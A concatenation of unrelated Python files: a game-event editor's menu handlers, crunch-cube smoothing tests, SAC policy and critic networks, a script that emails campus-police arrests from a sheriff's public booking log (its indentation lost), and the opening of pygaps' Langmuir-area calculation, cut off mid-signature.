def add_bg_opacity(self, _):
    """Menu handler: append a background-opacity command panel."""
    command = CommandRepr(
        self.event.func_names["bg_opacity"],
        [
            ["unk0", "uint", 0],
            ["unk1", "uint", 0],
            ["unk2", "uint", 0],
            ["Opacity", "uint", 120],
        ],
    )
    self.add_command_panel(command)
def add_set_voice(self, _):
    """Menu handler: append a set-voice command panel."""
    command = CommandRepr(
        self.event.func_names["set_voice"],
        [["Voice ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_sfx_sad(self, _):
    """Menu handler: append an SAD sound-effect command panel."""
    command = CommandRepr(
        self.event.func_names["sfx_sad"],
        [["SFX ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_bg_music(self, _):
    """Menu handler: append a background-music command panel."""
    command = CommandRepr(
        self.event.func_names["bg_music"],
        [
            ["Music ID", "uint", 0],
            ["Volume", "float", 1.0],
            ["unk2", "uint", 0],
        ],
    )
    self.add_command_panel(command)
def add_bg_shake(self, _):
    """Menu handler: append a background-shake command panel."""
    command = CommandRepr(
        self.event.func_names["bg_shake"],
        [["unk0", "uint", 30]],
    )
    self.add_command_panel(command)
def add_sfx_sed(self, _):
    """Menu handler: append an SED sound-effect command panel."""
    command = CommandRepr(
        self.event.func_names["sfx_sed"],
        [["SFX ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_btm_fade_out(self, _):
    """Menu handler: append a BGM fade-out command panel.

    NOTE(review): the method name says "btm" but the command key is
    "bgm_fade_out" -- the name is kept for caller compatibility.
    """
    command = CommandRepr(
        self.event.func_names["bgm_fade_out"],
        [
            ["unk0", "float", 0],
            ["unk1", "uint", 320],
        ],
    )
    self.add_command_panel(command)
def add_btm_fade_in(self, _):
    """Menu handler: append a BGM fade-in command panel.

    NOTE(review): the method name says "btm" but the command key is
    "bgm_fade_in" -- the name is kept for caller compatibility.
    """
    command = CommandRepr(
        self.event.func_names["bgm_fade_in"],
        [
            ["unk0", "float", 1.0],
            ["unk1", "uint", 320],
        ],
    )
    self.add_command_panel(command)
def add_dialogue_sfx(self, _):
    """Menu handler: append a dialogue sound-effect command panel."""
    # NOTE(review): two parameters are both labelled "unk2"; if parameter
    # lookup is ever done by name rather than position, the second would
    # shadow the first -- confirm against CommandRepr/to_gds semantics.
    command = CommandRepr(
        self.event.func_names["dialogue_sfx"],
        [
            ["SAD SFX ID", "uint", 0],
            ["unk1", "float", 0.0],
            ["unk2", "uint", 0],
            ["unk2", "uint", 0],
        ],
    )
    self.add_command_panel(command)
|
<reponame>Crunch-io/crunch-cube<filename>tests/integration/test_smoothing.py
# encoding: utf-8
"""Integration-test suite for smoothing feature."""
import numpy as np
import pytest
from cr.cube.cube import Cube
from ..fixtures import CR, NA
from ..util import load_python_expression
class DescribeSliceSmoothing:
    """Integration-test suite for _Slice smoothing (one-sided moving average)."""

    @pytest.mark.parametrize(
        "fixture, window, expectation",
        (
            (CR.CAT_X_CAT_DATE_WGTD, 4, "cat-x-cat-date-wgtd-smoothed-col-idx-w4"),
            (CR.CAT_X_MR_X_CAT_DATE, 3, "cat-x-mr-x-cat-date-smoothed-col-idx-w3"),
            (
                CR.CA_SUBVAR_X_CA_CAT_X_CAT_DATE,
                3,
                "ca-subvar-x-ca-cat-cat-date-smoothed-col-idx-w3",
            ),
            (CR.CAT_HS_X_CAT_DATE, 3, "cat-hs-x-cat-date-smoothed-col-idx-w3"),
            (CR.MR_X_CAT_DATE, 3, "mr-x-cat-date-smoothed-col-idx-w3"),
            (CR.NUMERIC_X_CAT_DATE, 3, "numeric-x-cat-date-smoothed-col-idx-w3"),
            (CR.TXT_X_CAT_DATE, 3, "txt-x-cat-date-smoothed-col-idx-w3"),
            (CR.DATETIME_X_CAT_DATE, 3, "datetime-x-cat-date-smoothed-col-idx-w3"),
        ),
    )
    def it_provides_smoothed_col_index_for_compatible_cubes(
        self, fixture, window, expectation
    ):
        """Column index is smoothed when the columns dimension is a cat-date."""
        transforms = {
            "columns_dimension": {
                "smoother": {
                    "function": "one_sided_moving_avg",
                    "window": window,
                }
            }
        }
        slice_ = Cube(fixture, transforms=transforms).partitions[0]
        np.testing.assert_array_almost_equal(
            slice_.smoothed_column_index, load_python_expression(expectation)
        )

    @pytest.mark.parametrize(
        "fixture, window, expectation",
        (
            (CR.CAT_X_CAT_DATE_WGTD, 4, "cat-x-cat-date-wgtd-smoothed-col-pct-w4"),
            (CR.CAT_X_MR_X_CAT_DATE, 3, "cat-x-mr-x-cat-date-smoothed-col-pct-w3"),
            (
                CR.CA_SUBVAR_X_CA_CAT_X_CAT_DATE,
                3,
                "ca-subvar-x-ca-cat-cat-date-smoothed-col-pct-w3",
            ),
            (CR.CAT_HS_X_CAT_DATE, 3, "cat-hs-x-cat-date-smoothed-col-pct-w3"),
            (CR.MR_X_CAT_DATE, 3, "mr-x-cat-date-smoothed-col-pct-w3"),
            (CR.NUMERIC_X_CAT_DATE, 3, "numeric-x-cat-date-smoothed-col-pct-w3"),
            (CR.TXT_X_CAT_DATE, 3, "txt-x-cat-date-smoothed-col-pct-w3"),
            (CR.DATETIME_X_CAT_DATE, 3, "datetime-x-cat-date-smoothed-col-pct-w3"),
        ),
    )
    def it_provides_smoothed_col_percent_for_compatible_cubes(
        self, fixture, window, expectation
    ):
        """Column percentages are smoothed when the columns dimension is a cat-date."""
        transforms = {
            "columns_dimension": {
                "smoother": {
                    "function": "one_sided_moving_avg",
                    "window": window,
                }
            }
        }
        slice_ = Cube(fixture, transforms=transforms).partitions[0]
        np.testing.assert_array_almost_equal(
            slice_.smoothed_column_percentages, load_python_expression(expectation)
        )

    @pytest.mark.parametrize(
        "fixture, expectation",
        (
            (CR.CAT_X_CAT_DATE, "cat-x-cat-date-smoothed-scale-means-w2"),
            (CR.CAT_X_CAT_DATE_WGTD, "cat-x-cat-date-smoothed-scale-means-w2"),
            (
                CR.CA_SUBVAR_X_CA_CAT_X_CAT_DATE,
                "ca-subvar-ca-cat-x-cat-date-scale-means-w2",
            ),
        ),
    )
    def it_provides_smoothed_scale_means_for_compatible_cubes(
        self, fixture, expectation
    ):
        """Column scale-means are smoothed with an explicit window of 2."""
        transforms = {
            "columns_dimension": {
                "smoother": {
                    "function": "one_sided_moving_avg",
                    "window": 2,
                }
            }
        }
        slice_ = Cube(fixture, transforms=transforms).partitions[0]
        np.testing.assert_array_almost_equal(
            slice_.smoothed_columns_scale_mean, load_python_expression(expectation)
        )

    def it_provides_smoothed_means_for_numeric_array(self):
        """Numeric-array means grouped by cat-date are smoothed column-wise."""
        transforms = {
            "columns_dimension": {
                "smoother": {
                    "function": "one_sided_moving_avg",
                    "window": 2,
                }
            }
        }
        slice_ = Cube(
            NA.NUM_ARR_MEANS_GROUPED_BY_CAT_DATE, transforms=transforms
        ).partitions[0]
        expectation = np.array(
            load_python_expression("num-array-means-grouped-by-cat-date-smoothed")
        )
        assert slice_.smoothed_means == pytest.approx(expectation, nan_ok=True)

    @pytest.mark.parametrize(
        "fixture",
        (CR.CAT_X_MR, CR.MR_X_MR, CR.MR_X_CA_CAT_X_CA_SUBVAR, CR.CAT_DATE_X_CAT),
    )
    def it_warns_and_does_not_smooth_when_dimension_is_not_smoothable(self, fixture):
        """A non-cat-date columns dimension warns and returns the base values."""
        transforms = {
            "columns_dimension": {
                "smoother": {
                    "function": "one_sided_moving_avg",
                    "window": 3,
                }
            }
        }
        slice_ = Cube(fixture, transforms=transforms).partitions[0]
        expected_warning_regex = (
            r"No smoothing performed. Column dimension must be a categorical date."
        )
        with pytest.warns(UserWarning, match=expected_warning_regex):
            smoothed_values = slice_.smoothed_column_percentages
        slice_ = Cube(fixture).partitions[0]
        base_values = slice_.column_percentages
        assert smoothed_values.tolist() == base_values.tolist()

    @pytest.mark.parametrize(
        "fixture, smoothed_prop_name, prop_name, periods, window",
        (
            (
                CR.CAT_X_CAT_DATE,
                "smoothed_column_percentages",
                # --- fixed: previously repeated "smoothed_column_percentages",
                # --- which compared the smoothed property against itself; the
                # --- base (unsmoothed) property is the correct comparand, as
                # --- in the other rows below.
                "column_percentages",
                4,
                1,
            ),
            (CR.CAT_X_CAT_DATE, "smoothed_column_index", "column_index", 4, 1),
            (
                CR.CAT_X_CAT_DATE,
                "smoothed_columns_scale_mean",
                "columns_scale_mean",
                4,
                1,
            ),
        ),
    )
    def it_warns_and_does_not_smooth_when_window_is_invalid(
        self, fixture, smoothed_prop_name, prop_name, periods, window
    ):
        """A window outside [2, periods] warns and returns the base values."""
        transforms = {
            "columns_dimension": {
                "smoother": {
                    "function": "one_sided_moving_avg",
                    "window": window,
                }
            }
        }
        slice_ = Cube(fixture, transforms=transforms).partitions[0]
        expected_warning_regex = (
            r"No smoothing performed. Smoothing window must be between 2 and the "
            r"number of periods \(%d\), got %d" % (periods, window)
        )
        with pytest.warns(UserWarning, match=expected_warning_regex):
            smoothed_values = getattr(slice_, smoothed_prop_name)
        base_values = getattr(slice_, prop_name)
        np.testing.assert_array_almost_equal(smoothed_values, base_values)

    def it_uses_default_smoothing_if_smoother_is_not_specified(self):
        """With no smoother transform, the default (window=2) is applied."""
        slice_ = Cube(CR.CAT_X_CAT_DATE).partitions[0]
        assert slice_.smoothed_column_percentages == pytest.approx(
            np.array(
                [
                    [np.nan, 28.4013529661, 30.877106856, 35.7038771792],
                    [np.nan, 42.5027849229, 47.5045000818, 47.491543065],
                    [np.nan, 13.8136228302, 13.0829651448, 11.170960187],
                    [np.nan, 5.12648613614, 3.74406807396, 1.54306531355],
                    [np.nan, 10.1557531444, 4.7913598429, 4.0905542544],
                ]
            ),
            nan_ok=True,
        )
class DescribeStrandMeansSmoothing:
    """Integration-test suite for _Strand smoothing behaviour."""

    def it_provides_smoothed_means_cat_date(self):
        """Means over a cat-date rows dimension are smoothed (window=3)."""
        smoother = {"function": "one_sided_moving_avg", "window": 3}
        strand_ = Cube(
            CR.CAT_DATE_MEAN, transforms={"rows_dimension": {"smoother": smoother}}
        ).partitions[0]
        np.testing.assert_array_almost_equal(
            strand_.smoothed_means,
            [np.nan, np.nan, 2.65670765025029, 2.5774816240050358],
        )

    def it_does_not_smooth_means_mr_mean_filt_wgtd(self):
        """A non-cat-date rows dimension warns and leaves the means unchanged."""
        smoother = {"function": "one_sided_moving_avg", "window": 3}
        strand_ = Cube(
            CR.MR_MEAN_FILT_WGTD, transforms={"rows_dimension": {"smoother": smoother}}
        ).partitions[0]
        expected_warning_regex = (
            r"No smoothing performed. Row dimension must be a categorical date."
        )
        with pytest.warns(UserWarning, match=expected_warning_regex):
            means = strand_.smoothed_means
        assert means == pytest.approx([3.724051, 2.578429, 2.218593, 1.865335])
|
<gh_stars>1-10
import numpy as np
import torch
import torch.nn as nn
from SRL4RL.utils.nn_torch import MLP_mdn, MLP_Module, import_weight_init, pytorch2numpy
from SRL4RL.utils.utils import get_hidden
class QNetwork(nn.Module):
    """Twin Q-value critic: two independent MLPs (Q1 and Q2) over (obs, goal, action)."""

    def __init__(self, env_params, config):
        # env_params: dict with "obs" (shape tuple), "goal" (int) and "action"
        # (int) sizes; config: experiment hyper-parameter dict.
        super(QNetwork, self).__init__()
        self.method = config["method"]
        nb_hidden = get_hidden(config["nb_hidden"])
        print("nb_hidden critic:", nb_hidden)
        "Q1 & Q2 architectures"
        nb_layer = len(nb_hidden)
        if nb_layer > 1:
            assert not config["linearApprox"], "linearApprox with multiple nb_hidden!"
            activation = config["activation"]
        elif nb_layer == 1:
            if config["linearApprox"]:
                activation = None  # to make a linear policy network
            else:
                activation = config["activation"]
        # Append the scalar Q-value output layer.
        # NOTE(review): indentation was lost in this copy; this statement is
        # placed at method level so both the single- and multi-layer
        # configurations get a width-1 output -- confirm against the original.
        nb_hidden += [1]
        input_dim = env_params["obs"][0] + env_params["goal"] + env_params["action"]
        self.q1_network = MLP_Module(
            input_dim, nb_hidden, activation=activation, name="Q1"
        )
        self.q2_network = MLP_Module(
            input_dim, nb_hidden, activation=activation, name="Q2"
        )
        if config["weight_init"] != "none":
            weight_init_ = import_weight_init(config["weight_init"])
            self.q1_network.apply(weight_init_)
            self.q2_network.apply(weight_init_)

    def forward(self, action_, x, goal=None):
        # Concatenate observation (+ optional goal) with the action and
        # evaluate both critics; returns the pair (Q1, Q2).
        if goal is not None:
            x = torch.cat([x, goal], dim=1)
        xu = torch.cat([x, action_], 1)
        x1 = self.q1_network(xu)
        x2 = self.q2_network(xu)
        return x1, x2
def gaussian_logprob(noise, log_sig):
    """Log-density of a diagonal Gaussian sample, summed over the last axis.

    *noise* is the standardized sample ((x - mu) / sig), so each dimension
    contributes -0.5 * noise^2 - log_sig - 0.5 * log(2*pi).
    """
    dim = noise.size(-1)
    per_dim = -0.5 * noise.pow(2) - log_sig
    summed = per_dim.sum(-1, keepdim=True)
    return summed - 0.5 * np.log(2 * np.pi) * dim
def sampleNormal(mu, sig):
    """Reparameterized Gaussian draw: mu + sig * eps with eps ~ N(0, I).

    Returns (sample, eps); the raw noise is needed by gaussian_logprob.
    """
    eps = torch.randn_like(mu)
    sample = mu + eps * sig
    return sample, eps
class GaussianPolicy(nn.Module):
    """Squashed-Gaussian actor network (SAC-style): tanh(N(mu, sig)) scaled to the action range."""

    def __init__(self, env_params, config):
        # env_params: dict with "obs"/"goal"/"action" sizes and
        # "action_min"/"action_max" bounds; config: hyper-parameter dict.
        super(GaussianPolicy, self).__init__()
        self.method = config["method"]
        # Clamp bounds for the predicted log standard deviation.
        self.log_sig_min = -10
        self.log_sig_max = 2
        nb_hidden = get_hidden(config["nb_hidden"])
        nb_layer = len(nb_hidden)
        assert config["cutoff"] < nb_layer, "not enoug layers for cutoff"
        print("nb_hidden actor: {}, cutoff: {}".format(nb_hidden, config["cutoff"]))
        if nb_layer > 1:
            assert not config["linearApprox"], "linearApprox with multiple nb_hidden!"
        elif nb_layer == 1:
            if config["linearApprox"]:
                with_last_actv = False  # to make a linear policy network
            else:
                with_last_actv = True
        # NOTE(review): with_last_actv is only bound in the nb_layer == 1
        # branch; with nb_layer > 1 and cutoff == 0 the MLP_Module call below
        # would raise UnboundLocalError -- presumably cutoff > 0 is required
        # for deep nets; confirm.
        input_dim = env_params["obs"][0] + env_params["goal"]
        if config["cutoff"] > 0:
            # Shared trunk with mean/log-sigma heads built by MLP_mdn.
            self.pi_network, self.mean_linear, self.log_sig_linear, _ = MLP_mdn(
                input_dim,
                nb_hidden + [env_params["action"]],
                cutoff=config["cutoff"],
                activation=config["activation"],
            )
        else:
            self.pi_network = MLP_Module(
                input_dim,
                nb_hidden,
                activation=config["activation"],
                with_last_actv=with_last_actv,
                name="Pi",
            )
            self.mean_linear = nn.Linear(nb_hidden[-1], env_params["action"])
            self.log_sig_linear = nn.Linear(nb_hidden[-1], env_params["action"])
        if config["weight_init"] != "none":
            weight_init_ = import_weight_init(config["weight_init"])
            self.pi_network.apply(weight_init_)
        # Affine map taking tanh output in [-1, 1] onto [action_min, action_max].
        self.action_scale = torch.tensor(
            (env_params["action_max"] - env_params["action_min"]) / 2.0
        )
        self.action_bias = torch.tensor(
            (env_params["action_max"] + env_params["action_min"]) / 2.0
        )

    def forward(self, x, oneHot, goal=None):
        # Returns (mean, clamped log-sigma) of the pre-squash Gaussian.
        # oneHot is accepted but not used in this forward pass.
        if goal is not None:
            x = torch.cat([x, goal], dim=1)
        x = self.pi_network(x)
        mean = self.mean_linear(x)
        log_sig = self.log_sig_linear(x)
        log_sig = torch.clamp(log_sig, min=self.log_sig_min, max=self.log_sig_max)
        assert not torch.isnan(mean).any().item(), "isnan in mean!!"
        assert not torch.isnan(log_sig).any().item(), "isnan in log_sig!!"
        return mean, log_sig

    def normalizePi(self, mu, pi, log_pi):
        """Apply squashing function.
        See appendix C from https://arxiv.org/pdf/1812.05905.pdf
        """
        mu = torch.tanh(mu) * self.action_scale + self.action_bias
        pi = torch.tanh(pi)
        epsilon = 1e-6  # Avoid NaN (prevents division by zero or log of zero)
        # tanh change-of-variables correction to the log-probability.
        log_pi -= torch.log(self.action_scale * (1 - pi.pow(2)) + epsilon).sum(
            -1, keepdim=True
        )
        pi = pi * self.action_scale + self.action_bias
        return mu, pi, log_pi

    def sample(self, state, oneHot=False, goal=None):
        """Return (stochastic action, its log-prob, deterministic action)."""
        mu, log_sig = self.forward(state, oneHot=oneHot, goal=goal)
        sig = log_sig.exp()
        # for reparameterization trick (mu + sig * N(0,1))
        # Pre-squash distribution and sample
        x_t, noise = sampleNormal(mu=mu, sig=sig)
        log_pi = gaussian_logprob(noise, log_sig)
        mu, pi, log_pi = self.normalizePi(mu, x_t, log_pi)
        # Deterministic action is the squashed mean (mu).
        assert not torch.isnan(pi).any().item(), "isnan in pi!!"
        return pi, log_pi, mu

    def select_actions(self, state, evaluate=False, goal=None):
        # evaluate=True -> deterministic squashed mean; otherwise a sample.
        if evaluate:
            _, _, pi = self.sample(state, goal=goal)
        else:
            pi, _, _ = self.sample(state, goal=goal)
        # return action.detach().cpu().numpy()[0]
        return pytorch2numpy(pi).squeeze(axis=0)
|
import requests
import os.path
import pickle
import pyzmail
import subprocess
from bs4 import BeautifulSoup
# Shout-out to the very helpful Sergeant <NAME> of the SLO County Sheriff's Office for
# his help decoding the agency codes.
# Maps the booking log's agency codes to human-readable agency names.
# "??" entries are codes whose meaning is not (yet) known.
AGENCIES = {
    "AGPD": "Arroyo Grande PD",
    "ASHP": "??",
    "ATPD": "Atascadero PD",
    "BAIL": "??Court Bailiffs?",
    "CAPO": "California Department of Parks and Recreation: Oceano",
    "CAPR": "California Department of Parks and Recreation: San Luis Obispo",
    "CHPD": "CHP Coastal Division Headquarters",
    "CHPS": "CHP San Luis Obispo",
    "CHPT": "CHP Templeton",
    "CMC": "??",
    "COURT": "??",
    "CPPD": "Cal Poly University PD",
    "DA": "District Attorney",
    "GBPD": "Grover Beach PD",
    "MBPD": "Morro Bay PD",
    "OTHR": "Other Agency",
    "PBPD": "Pismo Beach PD",
    "PROB": "SLO Probation Officers",
    "PRPD": "Paso Robles PD",
    "SLPD": "San Luis Obispo PD",
    "SLSO": "San Luis Obispo County Sheriff's Office",
    "SPAR": "??",
}
# Maps booking-log violation codes to human-readable charge descriptions,
# grouped by the California code they come from. Codes not listed here are
# rendered as "Unknown" and collected for later addition.
CHARGES = {
    # California Business & Professional Code
    "25661(A) BP": "Minor in Possession of a False ID",
    "25662(A) BP": "Minor in Possession",
    # California Health & Safety Code
    "11350 HS": "Possession of a Controlled Substance",
    "11357(B) HS": "Possession of <1 oz Marijuana",
    "11364(A) HS": "Possession of Paraphernalia",
    "11377(A) HS": "Misdemeanor - Possession of a Controlled Substance",
    "11550 HS": "Use/Under Influence of Controlled Substance",
    "11550(A) HS": "Under the Influence of a Controlled Substance",
    # California Penal Code
    "69 PC": "Resisting an Officer",
    "148(A) PC": "Obstructs/Resists Public Officer, etc.",
    "148(A)(1) PC": "Resisting Arrest/Obstruction of Justice",
    "148.9(A) PC": "False Identification to Peace Officer",
    "166(C)(4) PC": "Violation of Protective Order w/Prior",
    "186.22(A) PC": "FELONY - PARTICIPATE IN CRIMINAL STREET GANG",
    "243(B) PC": "BATTERY ON PEACE OFFICER/EMERGENCY PERSONNEL/ETC",
    "243(D) PC": "Battery w/Serious Injury",
    "245(A)(1) PC": "FELONY - ASSAULT W/DEADLY WEAPON OTHER THAN FIREARM OR GBI",
    "272(A)(1) PC": "Contribute to the Deliquency of a Minor",
    "273.5 PC": "INFLICT CORPORAL INJURY ON SPOUSE/COHABITANT",
    "290.011(A) PC": "Failure to Register as a Sex Offender",
    "311.11(A) PC": "OBS - POSSESS/ETC MATTER DEPICTING MINOR UNDER 14 IN SEX",
    "368(B)(1) PC": "Felony Elder Abuse w/GBI",
    "459 PC": "Burglary",
    "484(A) PC": "Petty Theft/Larceny",
    "496D(A) PC": "FELONY - VEH/TRAILER CONST EQUIP KNOWN TO BE STOLEN",
    "537E(A) PC": "MISDEMEANOR - BUY/SELL ARTICLES WITH IDENTIFICATION REMOVED",
    "647(F) PC": "Drunk in Public",
    "664/211 PC": "Attempted Robbery",
    "853.8 PC": "Failure to Appear (Promise to Appear)",
    "978.5 PC": "Felony Failure to Appear (Bench Warrant)",
    "1203.2 PC": "Violation of Probation",
    "1203.2(A) PC": "Revocation of Probation Rearrest",
    "3056 PC": "Violation of Parole",
    "3455(A) PC": "Violation of Post Release Supervision",
    "3455(B)(1) PC": "Violation of Post Release Community Supervision",
    "4573 PC": "Bringing Narcotics to a Prisoner",
    "4574(A) PC": "WEAPON/TEAR GAS OFFENSE:PRISON/JAIL/ETC",
    "29800(A)(1) PC": "Felon in Possession of a Firearm",
    # California Vehicle Code
    "5200 VC": "Display of License Plates",
    "10851(A) VC": "FELONY - AUTO THEFT, PERMNNTLY/TEMP DEPRIVE OWNER OF POSS",
    "12500(A) VC": "Driving w/o a License",
    "14601.1(A) VC": "Driving w/Suspended License",
    "14601.2(A) VC": "Driving w/Suspended License, Under The Influence related",
    "20002(A) VC": "HIT-RUN, PROPERTY DAMAGE, INCLUDING VEHICLES",
    "22450 VC": "Failure to Stop at a Stop Sign",
    "23152 VC": "DUI (general)",
    "23152(A) VC": "DUI (alcohol)",
    "23152(B) VC": "DUI, >0.08 BAC",
    "23152(E) VC": "DUI (drug), first offense",
    "23224(A) VC": "Minor Driving w/Alcohol",
    "22349(A) VC": "Exceeding the Posted Speed Limit",
    "40515 VC": "Failure to Appear wrt Promise to Appear/Continuance",
}
# Subscriber name -> email address, loaded from the "subscribers" file
# (one "Name: email" entry per line).
SUBSCRIBERS = {}
with open("subscribers", "r") as subscribers:
    for line in subscribers:
        line = line.strip()
        # Skip blank lines: the old readline() loop treated the first blank
        # line as EOF-or-crash ("".split(": ") raised ValueError on unpack).
        if not line:
            continue
        name, email = line.split(": ")
        SUBSCRIBERS[name] = email
logData = requests.get("http://www.slosheriff.org/WebLogs/BookingLog/Data/WebBookingLog.xml").text
tree = BeautifulSoup(logData, "lxml-xml")
if not os.path.isfile("previous_bookings"):
# Skip unpickling the old set and just establish an empty one
previousBookings = set()
else:
# Unpickle the old bookings.
pbfile = open("previous_bookings", "r")
previousBookings = pickle.load(pbfile)
pbfile.close()
updCharges = tree.findAll(Agency="CPPD")
newBookings = []
for charge in updCharges:
# Is this a known booking, or a novel booking?
bookingNo = charge.parent.get("bookingNo")
if bookingNo in previousBookings:
# Seen it.
continue
# So we've got a new charge, at least.
# Add it to the newBookings list if it's not already there.
# I could use a set, but this way we keep the order intact from the booking log,
# which is already sorted.
if charge.parent not in newBookings:
newBookings += [charge.parent]
notifyList = []
newCharges = set()
for booking in newBookings:
# Process each newBooking into an ASCII summary for the notif email.
str = booking.get("date") + "\n"
str += "%s - %s y/o %s, DOB %s\n" % (booking.get("name"), booking.get("age"), booking.get("sex"), booking.get("dob"))
str += "--> Charged with:\n"
for charge in booking.findAll("Charge"):
code = charge.get("ViolationCode")
if code not in CHARGES:
newCharges.add(code)
str += " * %s (%s)\n" % (CHARGES.get(code, "Unknown"), code)
if booking.ScheduledEvent:
type = booking.ScheduledEvent.get("type")
# Make the caps work on the event type.
type = type[0] + type[1:].lower()
str += "%s Date: %s\n" % (type, booking.ScheduledEvent.get("date"))
notifyList += [str]
if newCharges:
str = "New Charges: " + ", ".join(newCharges)
notifyList += [str]
if not notifyList:
# Nothing new today. Don't bother people with an email.
print "Nothing new."
exit(0)
if len(SUBSCRIBERS) == 0:
print "\n\n".join(notifyList)
exit(0)
# Make a datestamp using /bin/date. Sue me :)
binDate = subprocess.Popen(['date', '+%m/%d/%Y'], stdout=subprocess.PIPE)
datestamp, _ = binDate.communicate()
sender = ('UPD Bot', '<EMAIL>')
recipients = SUBSCRIBERS.items()
subject = u'UPD Booking Log for %s' % datestamp.strip()
text_content = "\n\n".join(notifyList)
prefered_encoding='iso-8859-1'
text_encoding='iso-8859-1'
payload, mail_from, rcpt_to, msg_id=pyzmail.compose_mail(
sender,
recipients,
subject,
prefered_encoding,
(text_content, text_encoding))
smtp_host = "email-smtp.us-east-1.amazonaws.com"
smtp_port = 587
smtp_mode = "tls"
with open("aws_credentials", "r") as creds:
smtp_login, smtp_password = creds.read().strip().split(":")
ret = pyzmail.send_mail(payload, mail_from, rcpt_to, smtp_host,
smtp_port=smtp_port, smtp_mode=smtp_mode,
smtp_login=smtp_login, smtp_password=smtp_password)
if ret == {}:
print "All good."
else:
print "Some kind of error: " + ret
# Exit now, because we failed to actually send people the updates
# for the new bookings.
exit(1)
# Finally, time to update the previous bookings set.
for booking in newBookings:
previousBookings.add(booking.get("bookingNo"))
pbfile = open("previous_bookings", "w")
pickle.dump(previousBookings, pbfile)
pbfile.close()
|
<filename>src/pygaps/characterisation/area_lang.py
"""This module contains Langmuir area calculations."""
import textwrap
import numpy
from scipy import constants
from scipy import stats
from pygaps import logger
from pygaps.core.adsorbate import Adsorbate
from pygaps.core.modelisotherm import ModelIsotherm
from pygaps.core.pointisotherm import PointIsotherm
from pygaps.utilities.exceptions import CalculationError
from pygaps.utilities.exceptions import ParameterError
from pygaps.utilities.exceptions import pgError
def area_langmuir(
    isotherm: "PointIsotherm | ModelIsotherm",
    branch: str = 'ads',
    p_limits: "tuple[float, float]" = None,
    verbose: bool = False,
):
    r"""
    Calculate the Langmuir area of an isotherm.

    The optional ``p_limits`` parameter allows to specify the upper and lower
    pressure limits to calculate the Langmuir area, otherwise the limits will be
    automatically set to 5-90% of isotherm pressure range.

    Parameters
    ----------
    isotherm : PointIsotherm, ModelIsotherm
        The isotherm of which to calculate the Langmuir surface area.
    branch : {'ads', 'des'}, optional
        Branch of the isotherm to use. It defaults to adsorption.
    p_limits : tuple[float, float], optional
        Pressure range in which to perform the calculation.
    verbose : bool, optional
        Prints extra information and plots graphs of the calculation.

    Returns
    -------
    dict
        A dictionary of results with the following components. The basis of these
        results will be derived from the basis of the isotherm (per mass, per
        volume, or per mole of adsorbent):

        - ``area`` (float) : calculated Langmuir surface area, in m2/unit of material
        - ``langmuir_const`` (float) : the constant in the Langmuir fit
        - ``n_monolayer`` (float) : the amount adsorbed at the monolayer
        - ``langmuir_slope`` (float) : slope of the Langmuir plot
        - ``langmuir_intercept`` (float) : intercept of the Langmuir plot
        - ``corr_coef`` (float) : correlation coefficient of the linear region in the Langmuir plot

    Raises
    ------
    ParameterError
        When something is wrong with the function parameters.
    CalculationError
        When the calculation itself fails.

    Notes
    -----
    *Description*

    The Langmuir theory [#]_, proposed at the start of the 20th century, states
    that adsorption happens on individual active sites on a surface in a single
    layer. It is derived based on several assumptions.

    * All sites are equivalent and have the same chance of being occupied.
    * Each adsorbate molecule can occupy one adsorption site.
    * There are no interactions between adsorbed molecules.
    * The rates of adsorption and desorption are proportional to the number of
      sites currently free and currently occupied, respectively.
    * Adsorption is complete when all sites are filled.

    The Langmuir equation is then:

    .. math::

        n = n_m\frac{KP}{1+KP}

    The equation can be rearranged as:

    .. math::

        \frac{P}{n} = \frac{1}{K n_m} + \frac{P}{n_m}

    Assuming the data can be fitted with a Langmuir model, by plotting
    :math:`\frac{P}{n}` against pressure, a line will be obtained. The slope and
    intercept of this line can then be used to calculate :math:`n_{m}`,
    the amount adsorbed at the monolayer, as well as K, the Langmuir constant.

    .. math::

        n_m = \frac{1}{s}

        K = \frac{1}{i * n_m}

    The surface area can then be calculated by using the moles adsorbed at the
    monolayer. If the specific area taken by one of the adsorbate molecules on the surface
    is known, it is inserted in the following equation together with Avogadro's number:

    .. math::

        a(Langmuir) = n_m A_N \sigma

    *Limitations*

    The Langmuir method for determining surface area assumes that only one single
    layer is adsorbed on the surface of the material. As most adsorption processes
    (except chemisorption) don't follow this behaviour, it is important to regard
    the Langmuir surface area as an estimate.

    References
    ----------
    .. [#] <NAME>, <NAME>. Soc., 38, 2219 (1916); 40, 1368 (1918)

    See Also
    --------
    pygaps.characterisation.area_lang.area_langmuir_raw : low level method
    """
    # get adsorbate properties (cross-sectional area in nm2 per molecule)
    adsorbate = Adsorbate.find(isotherm.adsorbate)
    cross_section = adsorbate.get_prop("cross_sectional_area")

    # Read data in (molar loading; relative pressure is required by the fit)
    loading = isotherm.loading(
        branch=branch,
        loading_unit='mol',
        loading_basis='molar',
    )
    try:
        pressure = isotherm.pressure(
            branch=branch,
            pressure_mode='relative',
        )
    except pgError as err:
        raise CalculationError(
            "The isotherm cannot be converted to a relative basis. "
            "Is your isotherm supercritical?"
        ) from err

    # If on an desorption branch, data will be reversed so pressure ascends
    if branch == 'des':
        loading = loading[::-1]
        pressure = pressure[::-1]

    # use the langmuir function (low-level worker does the actual fit)
    (
        langmuir_area,
        langmuir_const,
        n_monolayer,
        slope,
        intercept,
        minimum,
        maximum,
        corr_coef,
    ) = area_langmuir_raw(
        pressure,
        loading,
        cross_section,
        p_limits,
    )

    if verbose:
        logger.info(
            textwrap.dedent(
                f"""\
                Langmuir area: a = {langmuir_area:.4g} m2/{isotherm.material_unit}
                Minimum pressure point is {pressure[minimum]:.3g} and maximum is {pressure[maximum]:.3g}
                The Langmuir constant is: K = {langmuir_const:.3g}
                Amount Langmuir monolayer is: n = {n_monolayer:.3g} mol/{isotherm.material_unit}
                The slope of the Langmuir fit: s = {slope:.3g}
                The intercept of the Langmuir fit: i = {intercept:.3g}
                """
            )
        )
        # Generate plot of the langmuir points chosen
        # (import is local to avoid a hard matplotlib dependency when not plotting)
        from pygaps.graphing.calc_graphs import langmuir_plot
        langmuir_plot(
            pressure,
            langmuir_transform(pressure, loading),
            minimum,
            maximum,
            slope,
            intercept,
        )

    return {
        'area': langmuir_area,
        'langmuir_const': langmuir_const,
        'n_monolayer': n_monolayer,
        'langmuir_slope': slope,
        'langmuir_intercept': intercept,
        'corr_coef': corr_coef,
        'p_limit_indices': (minimum, maximum),
    }
def area_langmuir_raw(
    pressure: "list[float]",
    loading: "list[float]",
    cross_section: float,
